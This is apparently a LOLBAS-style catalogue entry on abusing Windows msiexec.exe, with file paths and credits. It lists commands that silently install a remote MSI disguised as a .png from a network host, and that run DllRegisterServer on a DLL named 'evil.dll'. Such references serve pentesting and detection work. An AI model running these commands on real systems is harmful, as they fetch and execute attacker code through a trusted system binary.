msiexec /q /i http://192.168.100.3/tmp/cmd.png
Installs the target remote & renamed .MSI file silently.
msiexec /y "C:\folder\evil.dll"
Calls DLLRegisterServer to register the target DLL.
msiexec /z "C:\folder\evil.dll"
Calls DLLRegisterServer to un-register the target DLL.
-
Windows binary: True
-
Bypasses Default AppLocker Rules: False
-
Links:
-
File path:
- c:\windows\system32\msiexec.exe
- c:\windows\sysWOW64\msiexec.exe
-
Acknowledgement:
- Name: netbiosX
- Twitter: @netbiosX
- Blog: https://pentestlab.blog/
- Name: Philip Tsukerman
- Twitter: @PhilipTsukerman
- Blog:
- Name: netbiosX
OS: